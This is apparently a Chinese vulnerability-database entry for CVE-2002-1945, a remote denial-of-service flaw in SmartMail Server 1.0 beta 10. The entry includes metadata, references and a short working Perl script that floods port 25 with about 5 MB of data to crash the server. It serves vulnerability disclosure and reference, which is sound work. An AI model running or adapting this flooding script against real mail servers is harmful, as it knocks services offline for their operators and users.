SmartMail服务器超大请求服务拒绝漏洞

SmartMail服务器超大请求服务拒绝漏洞

漏洞ID 1107070 漏洞类型 缓冲区溢出
发布时间 2002-10-31 更新时间 2005-10-20
图片[1]-SmartMail服务器超大请求服务拒绝漏洞-安全小百科CVE编号 CVE-2002-1945
图片[2]-SmartMail服务器超大请求服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200212-293
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21973
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-293
|漏洞详情
SmartMailServer1.0测试版10存在缓冲区溢出漏洞。远程攻击者借助(1)TCP端口25(SMTP)或者(2)TCP端口110(POP3)的超长请求导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/6075/info

SmartMail Server is reported to be prone to a remote denial of service
condition. It is possible to trigger this condition by sending large amounts (5MB+) of data to the server via TCP port 25 or 110.

SmartMail Server will need to be restarted to regain normal functionality.

This issue was reported in SmartMail Server 1.0 BETA 10. It is not known if other versions are affected. 

#!/usr/bin/perl -w
# tool smartdos.pl
# [email protected]
# Greetz: marocit and #crack.fr (specialement christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
 print "n write the target IP!nn";
 exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "nsending exploit......nn";
|参考资料

来源:BID
名称:6075
链接:http://www.securityfocus.com/bid/6075
来源:XF
名称:smartmail-server-ports-dos(10512)
链接:http://www.iss.net/security_center/static/10512.php
来源:BUGTRAQ
名称:20021031SmartMailserverDOS
链接:http://archives.neohapsis.com/archives/bugtraq/2002-10/0418.html

相关推荐: splitvt格式字符串漏洞

splitvt格式字符串漏洞 漏洞ID 1106190 漏洞类型 缓冲区溢出 发布时间 2001-01-26 更新时间 2005-10-20 CVE编号 CVE-2001-0112 CNNVD-ID CNNVD-200103-033 漏洞平台 Linux CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享